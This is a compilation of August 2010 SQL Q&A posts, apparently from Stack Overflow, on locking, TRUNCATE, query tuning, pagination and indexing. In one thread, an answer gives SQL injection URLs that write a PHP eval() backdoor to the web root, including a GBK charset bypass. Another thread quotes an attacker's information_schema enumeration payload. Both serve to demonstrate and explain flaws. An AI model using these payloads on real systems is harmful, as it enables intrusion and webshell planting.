Best sql questions in August 2010

Only inserting a row if it's not already there

16 votes

I had always used something similar to the following to achieve it:

INSERT INTO TheTable
SELECT
    @primaryKey,
    @value1,
    @value2
WHERE
    NOT EXISTS
    (SELECT
        NULL
    FROM
        TheTable
    WHERE
        PrimaryKey = @primaryKey)

...but once under load, a primary key violation occurred. This is the only statement which inserts into this table at all. So does this mean that the above statement is not atomic?

The problem is that this is almost impossible to recreate at will.

Perhaps I could change it to something like the following:

INSERT INTO TheTable
WITH
    (HOLDLOCK,
    UPDLOCK,
    ROWLOCK)
SELECT
    @primaryKey,
    @value1,
    @value2
WHERE
    NOT EXISTS
    (SELECT
        NULL
    FROM
        TheTable
    WITH
        (HOLDLOCK,
        UPDLOCK,
        ROWLOCK)
    WHERE
        PrimaryKey = @primaryKey)

Although, maybe I'm using the wrong locks or using too much locking or something.

I have seen other questions on stackoverflow.com where answers are suggesting a "IF (SELECT COUNT(*) ... INSERT" etc., but I was always under the (perhaps incorrect) assumption that a single SQL statement would be atomic.

Does anyone have any ideas?

Thanks.

Adam

What about the "JFDI" pattern?

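BEGIN TRY
    INSERT INTO TheTable VALUES (@primaryKey, @value1, @value2);
END TRY
BEGIN CATCH
    -- 2627 is a primary key violation: the row is already there, so ignore it.
    IF ERROR_NUMBER() <> 2627
    BEGIN
        -- Anything else is re-raised to the caller.
        DECLARE @msg nvarchar(2048);
        SET @msg = ERROR_MESSAGE();
        RAISERROR('%s', 16, 1, @msg);
    END
END CATCH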

Seriously, this is the quickest and most concurrent approach, with no locks, especially at high volumes. What if the UPDLOCK is escalated and the whole table is locked?
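A minimal sketch of the same "just do it" idea, using Python's built-in sqlite3 module as a stand-in for SQL Server (an assumption, as are the column names and the helper name insert_if_absent). The primary key constraint does the existence check, and the duplicate-key error is swallowed instead of being prevented up front.

```python
import sqlite3

def insert_if_absent(conn, key, value1, value2):
    """Try the insert; return True if a row was added, False if the key existed."""
    try:
        with conn:  # commits on success, rolls back if an exception is raised
            conn.execute(
                "INSERT INTO TheTable (PrimaryKey, Value1, Value2) VALUES (?, ?, ?)",
                (key, value1, value2),
            )
        return True
    except sqlite3.IntegrityError:
        # SQLite's counterpart of SQL Server error 2627. IntegrityError covers
        # any constraint failure; this table only has the primary key.
        return False

# Hypothetical table layout, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE TheTable (PrimaryKey INTEGER PRIMARY KEY, Value1 TEXT, Value2 TEXT)"
)
first = insert_if_absent(conn, 1, "a", "b")   # row is new
second = insert_if_absent(conn, 1, "c", "d")  # same key again
row_count = conn.execute("SELECT COUNT(*) FROM TheTable").fetchone()[0]
```

The second call leaves the table untouched, so callers can fire the insert without checking first.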

Read lesson 4

Difference between Delete and Truncate in sql server. Was I wrong... ?

14 votes

In a recent interview I was asked the difference between the two. I gave the general answer that we all know...

The interviewer then asked whether truncate can be rolled back. I replied no...

The interviewer said that it can be rolled back, and asked me to go through the details of what delete and truncate do behind the scenes and check it later.

Well, I am posting this question here not just for the definition and the things we know, but to get to the core of it. Any light thrown on this aspect will be highly appreciated.

Thanks in advance

Apparently the idea that truncate can't be rolled back is a myth.

Summary

  • Truncate can be rolled back from within a transaction. The difference is that the truncate gets logged as a page deallocation in the log instead of a delete for each record being removed. Once the operation is committed it can't be undone.
  • When you truncate, you are resetting the identity field. When you delete, you are not.
  • You can't truncate a table that is referenced by a foreign key.
  • Truncating will not fire any ON DELETE triggers.

Found a weak escape function for MySql, how to exploit?

13 votes

In an application I'm working on I've found a weak escape function to prevent injection. I'm trying to prove this, but I'm having trouble coming up with a simple example.

The escape function works as follows (PHP example).

function escape($value) {

  $value = str_replace("'","''",$value);
  $value = str_replace("\\","\\\\",$value);
  return $value;

}

I realize this doesn't deal with values encoded using double quotes ("), but all queries are constructed using single quotes (').

Who can defeat this escape function?

Requirements:

  • Strings in queries are always enclosed in quotes.
  • Double-quotes are never used.
  • MySQL connection is set to UTF8.

Simple examples:

$sql = "SELECT id FROM users WHERE username = '" . escape($username) . "' AND password = '" . escape($password) . "'";
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";

If you were just replacing ' with '', then you could exploit this by injecting a \' which would turn into a \''. That would allow you to break out, because it gives you a "character literal" single quote followed by a real single quote. However, the replacement of "\\" with "\\\\" negates this attack. Doubling the single quote is how MS-SQL escapes single quotes; this isn't the proper way for MySQL, but it can work.
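The effect of the two replacement steps can be traced with a small Python port of the function. This is only an illustration of the string handling, not a MySQL test, and the name escape_quotes_only is hypothetical (it stands for the weaker variant without the backslash step).

```python
def escape_quotes_only(value: str) -> str:
    # Weaker variant: only doubles single quotes.
    return value.replace("'", "''")

def escape(value: str) -> str:
    # Port of the PHP escape(): double the quotes first, then the backslashes.
    value = value.replace("'", "''")
    value = value.replace("\\", "\\\\")
    return value

payload = "\\'"                     # two characters: backslash, single quote
weak = escape_quotes_only(payload)  # backslash, quote, quote
full = escape(payload)              # backslash, backslash, quote, quote
```

In weak, MySQL would read the backslash plus the first quote as an escaped quote, leaving the second quote free to close the string. In full, the two backslashes form a literal backslash and the two quotes form a literal quote, so nothing is left over.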

The following code proves that this escape function is safe in all but three conditions. It permutes through all possible combinations of control characters, testing each one to make sure no error occurs with a select statement enclosed in single quotes. This code was tested on MySQL 5.1.41.

<?php
mysql_connect("localhost",'root','');
function escape($value) {

  $value = str_replace("'","''",$value);
  $value = str_replace("\\","\\\\",$value);
  return $value;

}

$chars=array("'","\\","\0","a");

for($w=0;$w<4;$w++){
    for($x=0;$x<4;$x++){
        for($y=0;$y<4;$y++){
            for($z=0;$z<4;$z++){
                mysql_query("select '".escape($chars[$w].$chars[$x].$chars[$y].$chars[$z])."'") or die("!!!! $w $x $y $z ".mysql_error());
            }       
        }
    }
}
print "Escape function is safe :(";
?>

Vulnerable Condition 1: no quote marks used.

mysql_query("select username from users where id=".escape($_GET['id']));

Exploit:

http://localhost/sqli_test.php?id=union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"

Vulnerable Condition 2: double quote marks used

mysql_query("select username from users where id=\"".escape($_GET['id'])."\"");

Exploit:

http://localhost/sqli_test.php?id=" union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1

Vulnerable Condition 3: single quotes are used, but an alternative character set is in effect.

mysql_set_charset("GBK");
mysql_query("select username from users where id='".escape($_GET['id'])."'");

Exploit:

http://localhost/sqli_test.php?id=%bf%27 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1

The conclusion is to always use mysql_real_escape_string() as the escape routine for MySQL. Parameterized query libraries like PDO and ADOdb always use mysql_real_escape_string() when connected to a MySQL database. addslashes() is a FAR BETTER escape routine than the one above because it takes care of vulnerable condition 2. It should be noted that not even mysql_real_escape_string() will stop condition 1; a parameterized query library, however, will.

This SELECT query takes 180 seconds to finish

10 votes

UPDATE:

Just to mention it in a more visible place: when I changed IN to =, the query execution time went from 180 seconds down to 0.00008 seconds. Ridiculous speed difference.


This SQL query takes 180 seconds to finish! How is that possible? Is there a way to optimize it to be faster?

SELECT IdLawVersionValidFrom 
FROM question_law_version 
WHERE IdQuestionLawVersion IN 
  (
  SELECT MAX(IdQuestionLawVersion) 
  FROM question_law_version 
  WHERE IdQuestionLaw IN 
    (
    SELECT MIN(IdQuestionLaw) 
    FROM question_law 
    WHERE IdQuestion=236 AND IdQuestionLaw>63
    )
  )

There are only about 5000 rows in each table so it shouldn't be so slow.

(Posting my comment as an answer as apparently it did make a difference!)

Any difference if you change the IN to =?

If anyone wants to investigate this further I've just done a test and found it very easy to reproduce.

Create Table

CREATE TABLE `filler` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  PRIMARY KEY (`id`)
) 

Create Procedure

CREATE PROCEDURE `prc_filler`(cnt INT)
BEGIN
        DECLARE _cnt INT;
        SET _cnt = 1;
        WHILE _cnt <= cnt DO
                INSERT
                INTO    filler
                SELECT  _cnt;
                SET _cnt = _cnt + 1;
        END WHILE;
END

Populate Table

  call prc_filler(5000)

Query 1

SELECT id 
FROM filler 
WHERE id =  (SELECT MAX(id) FROM filler  WHERE id =   
 ( SELECT MIN(id) 
    FROM filler
    WHERE id between 2000 and 3000
    )
  )

Equals Explain Output

Query 2 (same problem)

SELECT id 
FROM filler 
WHERE id in  (SELECT MAX(id) FROM filler  WHERE id in   
 ( SELECT MIN(id) 
    FROM filler
    WHERE id between 2000 and 3000
    )
  )

In Explain Output

Anybody using SQL Source Control from Red Gate

10 votes

We have been looking into possible solutions for our SQL source control. I just came across Red Gate's SQL Source Control and wondered if anyone has implemented it? I am going to download the trial and give it a shot, but just wanted to see if others have real experience.

As always greatly appreciate the input

--S

I use SQL Compare for generating scripts when going from dev -> test -> production and it saves me tons of time.

For source control, though, we use SVN and ScriptDB (http://scriptdb.codeplex.com/). I mainly use source control of SQL scripts for keeping track of changes. I think that rolling back a version of the database seldom (if ever) works, since data may have changed when making structure changes.

This works fine for a few of our current projects (largest is 200 tables and 2000 sprocs). The main reason for doing this though is cost since not all team members have to buy SQL Compare (I avoid adding dependencies to commercial projects unless really needed).

How to store ordered items which often change position in DB

9 votes

I need to be able to store a large list of ordered items in the DB. So far that's straight-forward:

ID Position OtherFields
 1     45      ...
 2   4736      ...
 3    514      ...
 ...

In queries, I always need to get just a few items (filtered based on OtherFields) but in the correct order. Easy as well, putting an index on Position and using "order by Position".

Now the problem: Items change their Position frequently, and not just by 1 or 2. If ID 2 changes the Position from 4736 to 2000, I need to update its Position and the Position of all elements between old Position 2000 and 4735, adding 1 in each row. And it's not only one ID that changes per transaction but a few, and there can be many transactions within a short time.

I think the most elegant way to handle the update problem would be using a linked list instead of a Position column where I can just remove ID 2 from its old position by linking its predecessor to its successor and then insert it elsewhere by linking it between its new predecessor and successor. That would be a constant and small number of updates per Position change and it would also be my preferred way of handling the changes (in Java in my case). However this raises the N+1 problem for querying in the correct order - even for a few elements, I have to go through the whole list in the worst case for finding out their correct order.

So my question is: What would you recommend to get a good balance between necessary updates and query performance?

So far I see two promising directions:

  1. Is there a DBMS (ideally OpenSource) that can handle linked lists not only with syntactic sugar but also with a good performance, e.g. by using internal Indices for the linked elements?

  2. Maybe it would also be an option to just have a BLOB where the whole Linked List would be stored in! How big could such a Linked List get / how much memory would it use in the DB and when fetched for let's say 1.000.000 entries? I'm using Java + Hibernate in case it matters. I imagine that processing even the whole list in memory after fetching the BLOB should be pretty fast!?

But of course other ideas are welcome as well!

If you relax the constraint that the Position column must contain integers from 1 to N and instead allow it to contain any numbers then you can do both searches and updates efficiently.

You can insert an item between two other items with position A and B by calculating the average (A + B) DIV 2. For example if A is 10000 and B is 12000 then your new position is 11000. Occasionally you will run out of gaps due to clustering, at which point you can run through the whole table redistributing the positions more evenly.
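A minimal Python sketch of the midpoint idea, assuming integer positions. The function names and the spacing of 1000 used when redistributing are illustrative assumptions, not part of the answer.

```python
def position_between(a: int, b: int):
    """Return an integer position strictly between a and b, or None if no gap is left."""
    mid = (a + b) // 2
    return mid if a < mid < b else None

def redistribute(count: int, step: int = 1000):
    """Evenly spaced positions for `count` items; run this when the gaps run out."""
    return [step * (i + 1) for i in range(count)]

new_pos = position_between(10000, 12000)  # the example from the text
no_gap = position_between(5, 6)           # neighbours are adjacent, nothing fits
fresh = redistribute(3)                   # new positions after a rebalance
```

A move then costs a single UPDATE of the moved row's Position, and only the occasional rebalance touches the whole table.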

Data object storage - Can table JOIN's do what single table SELECT's cannot?

8 votes

Now that "NOSQL" or "object only" storage systems like MongoDB or memcached are really picking up steam, I was wondering if there are any requests that cannot be performed on them that can be performed using multiple object joins (in SQL that is JOIN "table"). In other words, are there any multi-table queries that cannot be handled by several single table queries in a row?

Basically, is there a use case where a multi-table join cannot be replicated by accessing one table at a time in object based storage systems?

Here are some examples of normal 3NF queries using has_many and has_many_through relations. These aren't the most complex queries, but they should give you a starting point for the concept. Note that any value in {} means a value from the result of the last query.


Company Has Many Users

SELECT user.*, company.name as company_name FROM user 
LEFT JOIN company ON company.id = user.company_id
WHERE user.id = 4

vs

SELECT * FROM user WHERE id = 4
SELECT * FROM company WHERE id = {user.company_id}

Club Has Many Students Through Memberships

SELECT student.* FROM student LEFT JOIN membership on
membership.student_id = student.id WHERE membership.club_id = 5

vs

SELECT * FROM membership WHERE club_id = 5
SELECT * FROM student WHERE id = {membership.student_id}

The reason I'm wondering is because I want to know if Object-based systems (that rely on accessing single table objects at a time) can do what RDBMS databases like PostgreSQL or MySQL can do.

So far the only thing wrong seems to be that more queries are necessary.

1 - running multiple separate queries leaves you with a concurrency mess: by the time you have got something from table 1 it could have been deleted, yet it might still be in table 2. Now assume 5 correlated tables.

2 - running queries with at least moderately complex logic over fields that are not mythical ID

3 - controlling the amount of data fetched (you hardly ever need more than 50% of the data which is needed to deserialize/create valid objects and even worse whole trees of connected objects)

4 - correlated queries (nested selects) which SQL server will optimize like joins to additive complexity or better (|T1|+|T2|+|T3|+|T4|) while any ORM or nonSQL will have to keep repeating inner queries, giving rise to multiplicative complexity (|T1|*|T2|*|T3|*|T4|)

5 - dataset sizes, scalability not just in dataset sizes but also in handling concurrency under updates. Even ORM-s which maintain transactions make them so long that chances for deadlocks increase exponentially.

6 - blind updates (a lot more data touched for no reason) and their dependency and failure based on a blind instrument (mythical version which is realistically needed in say 1% of relational data model but ORM and alikes have to have it everywhere)

7 - lack of any standards and compatibility - this means that your system and data will always be at much higher risk and dependent on software changes driven by academic adventurism rather than any actual business responsibility, with the expectation that you invest a lot of resources just in testing changes.

8 - data integrity - oops, some code just deleted half of today's order records from T1 since there was no foreign key to T2 to stop it. Perfectly normal thing to do with separated queries.

9 - negative maturity trend - keeps splintering instead of standardizing - give it 20 yr and maybe it will get stable

Last but not least - it doesn't reduce any complexity (the same correlation between data is still there) but it makes it very hard to track and manage complexity or have any realistic remedy or transparency when something goes wrong. And it adds the complexity of 1-2 layers. If something goes wrong in your SQL tables you have tools and queries to discover and even fix your data. What are you going to do when some ORM just tells you that it has an "invalid pointer" and throws an exception, since surely you don't want an "invalid object"?

I think that's enough :-)

Update statement running for too long or not

8 votes

I'm new to working with this much data (20 million rows) and I don't know what I should expect as far as query duration:

update table set field = '1234'  

No index on field. This statement took 25 minutes. The database is set to Simple Recovery. Does 25 minutes seem too long? Table has 9 columns with small data types <50 varchar.

If you updated 20M rows in one single transaction, then your time was entirely driven by your IO subsystem: what kind of drives you have, what disk file layout, etc. If you have 40 spindles in RAID 10 with 4 balanced files and a separate similar battery for the log, then the result is worryingly slow. If you tested this with one single MDF that shares the spindle with the LDF on a single consumer quality 5000rpm HDD, then your time is amazingly fast.

Is there a portable way to have "SELECT FIRST 10 * FROM T" semantic?

7 votes

I want to read data in blocks of say 10k records from a database.

I found Result limits on Wikipedia and it seems obvious that this can't be done with SQL in a portable way.

Another approach could be JdbcTemplate, which offers many methods for queries, but how could I decide that enough rows have been read? Callbacks like RowMapper and ResultSetExtractor have no way to indicate that enough data has been read.

EDIT: I was looking for a solution for JdbcTemplate. This post suggests using setMaxRows, which I had overlooked.

Grab Hibernate or JPA. Both are familiar with various database dialects and will handle the nasty DB specifics under the hood transparently.

In Hibernate you can paginate using Criteria#setFirstResult() and Criteria#setMaxResults(). E.g.

List users = session.createCriteria(User.class)
    .addOrder(Order.asc("id"))
    .setFirstResult(0) // Index of first row to be retrieved.
    .setMaxResults(10) // Amount of rows to be retrieved.
    .list();

In JPA you can do similar using Query#setFirstResult() and Query#setMaxResults().

List users = em.createQuery("SELECT u FROM User u ORDER BY u.id")
    .setFirstResult(0) // Index of first row to be retrieved.
    .setMaxResults(10) // Amount of rows to be retrieved.
    .getResultList();

Can you explain this SQL injection?

7 votes

The website I work on was recently the target of a hacking attempt using the following SQL injection script:

boys' and 3=8 union 
select 1, 
concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30), char(9),0x252423),
3,4,5,6,7,8,9 

from `information_schema`.`tables` 

where table_schema=0x62646B3032 limit 44,1 -- And '8'='8

This injection returned the MySQL table name. It was reported by the error reporting system on that website and we managed to fix that part; however, I am not able to understand what the above injection means.

Can anyone explain this?

Penuel

According to the documentation, MySQL's concat():

Returns the string that results from concatenating the arguments. May have one or more arguments. If all arguments are nonbinary strings, the result is a nonbinary string. If the arguments include any binary strings, the result is a binary string. A numeric argument is converted to its equivalent binary string form

So 0x232425 is converted to #$%, which is simply added to the beginning and end of the table_name field, maybe just to make it easier for them to pull out the table names later using a regex.

Later on, char(9) is equivalent to a tab and is just there to format the output more nicely.

The 3,4,5,6,7,8,9 is just there so that the columns match the boys table that they are performing the Union on.
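The hex literals in the payload can be decoded with a few lines of Python to see what the attacker actually sent. This is a small sketch; the helper name decode_mysql_hex is an assumption, and it only handles plain ASCII literals like the ones above.

```python
def decode_mysql_hex(literal: str) -> str:
    """Decode a MySQL hex literal such as 0x232425 into the string it stands for."""
    return bytes.fromhex(literal[2:]).decode("ascii")

prefix = decode_mysql_hex("0x232425")      # marker placed before the table name
suffix = decode_mysql_hex("0x252423")      # marker placed after the row count
default = decode_mysql_hex("0x30")         # fallback used inside ifnull()
schema = decode_mysql_hex("0x62646B3032")  # value compared with table_schema
tab = chr(9)                               # what char(9) produces
```

The closing marker is the opening marker reversed, and 0x30 is the character 0, which ifnull() substitutes when table_name or table_rows is NULL. Writing the strings as hex also means the payload needs no quote characters of its own.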

SQL-Query: EXISTS in Subtable

7 votes

I have two tables tabData and tabDataDetail. I want all idData(PK) from Parent-Table(tabData) that have only rows in Child-Table(tabDataDetail, FK is fiData) with:

  • fiActionCode=11 alone or
  • fiActionCode=11 and fiActionCode=34

Any other combination is invalid. How to get them?

What I've tried without success (it is slow and also gives me rows that have only fiActionCode 34):

alt text

Thanks for your Time.


EDIT: Thanks to all for their answers. Unfortunately I don't have enough time right now to check which one is best, or whether each works at all. I marked the first working one as the answer.

EDIT2: I think that the marked answer is really the most efficient and compact solution.

EDIT3: Codesleuth's answer is interesting because it returns only rows that have only a single fiActionCode=11. That is difficult to see, because it is only true for 20 tabDataDetail rows out of 41524189 total rows that have two. Anyway, that was not 100% what I asked for, or rather what I was looking for.

Select ...
From tabData As T1
Where Exists    (
                Select 1
                From tabDataDetail As TDD1
                Where TDD1.fiData = T1.idData
                    And TDD1.fiactionCode = 11
                )
    And Not Exists    (
                      Select 1
                      From tabDataDetail As TDD1
                      Where TDD1.fiData = T1.idData
                          And TDD1.fiactionCode Not In(11,34)
                    )

To expand on my logic, the first check (a correction) is to ensure that a row with fiActionCode = 11 exists. The second check works by first defining the set of rows we do not want. We do not want anything that is something other than fiActionCode = 11 or 34. Because that is the set of items we do not want, we search for anything that does not exist in that set.
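The two checks can be tried out on a tiny data set. The sketch below uses Python's sqlite3 module as a stand-in for SQL Server (an assumption), with four made-up parent rows that cover each case.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE tabData (idData INTEGER PRIMARY KEY);
    CREATE TABLE tabDataDetail (fiData INTEGER, fiActionCode INTEGER);
    INSERT INTO tabData VALUES (1), (2), (3), (4);
    INSERT INTO tabDataDetail VALUES
        (1, 11),            -- only 11: wanted
        (2, 11), (2, 34),   -- 11 and 34: wanted
        (3, 34),            -- only 34: fails the EXISTS check
        (4, 11), (4, 99);   -- has another code: fails the NOT EXISTS check
""")

rows = conn.execute("""
    SELECT T1.idData
    FROM tabData AS T1
    WHERE EXISTS (SELECT 1 FROM tabDataDetail AS D
                  WHERE D.fiData = T1.idData AND D.fiActionCode = 11)
      AND NOT EXISTS (SELECT 1 FROM tabDataDetail AS D
                      WHERE D.fiData = T1.idData
                        AND D.fiActionCode NOT IN (11, 34))
    ORDER BY T1.idData
""").fetchall()
matching_ids = [r[0] for r in rows]
```

Only parents 1 and 2 come back: parent 3 has no row with code 11, and parent 4 has a row outside the allowed set.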

Why does "SELECT DISTINCT a, b FROM..." return fewer records than "SELECT DISTINCT A + '|' + B FROM..." ?

7 votes

I have a query that's selecting a bunch of fields related to names and addresses of customers but it boils down to:

SELECT DISTINCT a, b, c, ... FROM big_dumb_flat_table

it returns a bunch of records (10986590). When I replace the commas in the select-list to format it as a pipe-separated concatenated string:

SELECT DISTINCT a + '|' + b + '|' + c + '|' + ... FROM big_dumb_flat_table

it's returning 248 more records. I've reassured myself that there are no pipes in any of the fields that could be screwing the fidelity of the returned set. What's going on here?

Trailing spaces could cause this. For string comparisons these are ignored.

CREATE TABLE #T
(
a varchar(10),
b varchar(10),
c varchar(10)
)

INSERT INTO #T
SELECT 'a ' as a, 'b' as b, 'c ' as c union all
SELECT 'a' as a, 'b' as b, 'c ' as c

SELECT DISTINCT a, b, c  
FROM #T /*1 result*/

SELECT DISTINCT a + '|' + b + '|' + c + '|'   
FROM #T /*2 results*/


SELECT DISTINCT LTRIM(RTRIM(a)) + '|' + LTRIM(RTRIM(b)) + '|' +
                LTRIM(RTRIM(c)) + '|'   
FROM #T /*1 result*/

WITH (NOLOCK) vs SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED

7 votes

Could someone give me some guidance on when I should use WITH (NOLOCK) as opposed to SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED

What are the pros/cons of each? Are there any unintended consequences you've run into using one as opposed to the other?

They are the same thing. The SET TRANSACTION ISOLATION LEVEL statement applies to all the tables in the connection, so if you only want NOLOCK on one or two tables, use the table hint; otherwise use the SET statement.

Both will give you dirty reads. If you are OK with that, then use them. If you can't have dirty reads, then consider snapshot or serializable hints instead.

is it faster to check a Date for Null or a bit for = 1/0

6 votes

I'm just wondering which is faster in SQL:

to have a Date column and check it for NULL, or to have a Date and a bit and check the bit for 1/0?

Is the bit going to be faster?

In order to check that a column IS NULL SQL Server would actually just check a bit anyway. There is a NULL BITMAP stored for each row indicating whether each column contains a NULL or not.

Sql Server Legacy Database To Clustered index or not

6 votes

We have a legacy database which is a SQL Server db (2005 and 2008).

All of the primary keys in the tables are UniqueIdentifiers.

The tables currently have no clustered index created on them and we are running into performance issues on tables with only 750k records. This is the first database I've worked on with unique identifiers as the sole primary key and I've never seen SQL Server be this slow at returning data.

I don't want to create a clustered index on the uniqueidentifier as they are not sequential and will therefore slow the apps down when it comes to inserting data.

We cannot remove the uniqueidentifier as that is used for remote site record identity management purposes.

I had thought about adding a big integer identity column to the tables and creating the clustered index on this column and including the unique identifier column.

i.e.

int identity - First column, to maintain insert speeds.
unique identifier - To ensure the application keeps working as expected.

The goal is to improve the identity query and joined table query performance.

Q1: Will this improve the query performance of the db or will it slow it down?

Q2: Is there an alternative to this that I haven't listed?

Thanks Pete

Edit: The performance issues are on retrieving data quickly through select statements, especially if a few of the more "transactional / changing" tables are joined together.

Edit 2: The joins between tables are generally all between the primary key and foreign keys, for tables that have foreign keys they are included in the non-clustered index to provide a more covering index.

The tables all have no other values which would provide a good clustered index.

I'm leaning more towards adding an additional identity column on each of the high load tables and then including the current Guid PK column within the clustered index to provide the best query performance.

Edit 3: I would estimate that 80% of the queries are performed on primary and foreign keys alone through the data access mechanism. Generally our data model has lazy loaded objects which perform the query when accessed, these queries use the objects id and the PK column. We have a large amount of user driven data exclusion / inclusion queries which use the foreign key columns as a filter based on the criteria of for type X exclude the following id's. The remaining 20% is where clauses on Enum (int) or date range columns, very few text based queries are performed in the system.

Where possible I have already added covering indexes to cover the heaviest queries, but as yet I'm still disappointed by the performance. As bluefooted says, the data is being stored as a heap.

If you don't have a clustered index on the table, it is being stored as a heap rather than a b-tree. Heap data access is absolutely atrocious in SQL Server so you definitely need to add a clustered index.

I agree with your analysis that the GUID column is a poor choice for clustering, especially since you don't have the ability to use NEWSEQUENTIALID(). You could create a new artificial integer key if you like, but if there is another column or combination of columns that would make sense as a clustered index, that is fine as well.

Do you have a field that is used frequently for range scans? Which columns are used for joins? Is there a combination of columns that also uniquely identifies the row aside from the GUID? Posting a sample of the data model would help us to suggest a good candidate for clustering.

Sql Server Displaying Items in specific order

6 votes

I have a list of items

ItemName Manufacturer TopSalesUnit

Item1     A             100   
Item2     A             80                      
Item3     A             60
Item4     B             70   
Item5     B             50   
Item6     B             30
Item7     C             10       
Item8     C             05

I would like the records to be ordered so that the highest TopSalesUnit item is shown first, then the next highest item from a different manufacturer is shown second, then the next highest item from a third manufacturer is shown, etc.:

ItemName Manufacturer TopSalesUnit

Item1       A             100    
Item4       B             070
Item7       C             010 
Item2       A             080
Item5       B             050 
Item8       C             005   
Item3       A             060 
Item6       B             030 

How to write a query in T-SQL to achieve it?

try:

DECLARE @YourTable table (ItemName varchar(10), Manufacturer char(1), TopSalesUnit int)

INSERT @YourTable VALUES ('Item1','A ',100)
INSERT @YourTable VALUES ('Item2','A ',80)                 
INSERT @YourTable VALUES ('Item3','A ',60)
INSERT @YourTable VALUES ('Item4','B ',70)   
INSERT @YourTable VALUES ('Item5','B ',50)   
INSERT @YourTable VALUES ('Item6','B ',30)
INSERT @YourTable VALUES ('Item7','C ',10)       
INSERT @YourTable VALUES ('Item8','C ',05)

SELECT
    dt.ItemName,dt.Manufacturer,dt.TopSalesUnit
    FROM (SELECT
              ItemName,Manufacturer,TopSalesUnit,ROW_NUMBER() OVER(PARTITION BY Manufacturer ORDER BY TopSalesUnit DESC) AS RowNumber
              FROM @YourTable
         ) dt 
    ORDER BY dt.RowNumber,dt.Manufacturer

OUTPUT:

ItemName   Manufacturer TopSalesUnit
---------- ------------ ------------
Item1      A            100
Item4      B            70
Item7      C            10
Item2      A            80
Item5      B            50
Item8      C            5
Item3      A            60
Item6      B            30

(8 row(s) affected)

How do you implement the equivalent of SQL IN() using .net

5 votes

In .net (c# or vb) expressions, how would you implement SQL's handy IN() functionality?

i.e. value in (1, 2, 4, 7)

rather than:

value = 1 or value = 2 or value = 4 or value = 7

There are obviously many ways, I'm looking for the most clean and simple!

using System;
using System.Linq;

static class SqlStyleExtensions
{
    public static bool In(this string me, params string[] set)
    {
       return set.Contains(me);
    }
}

Usage:

if (Variable.In("AC", "BC", "EA"))
{

}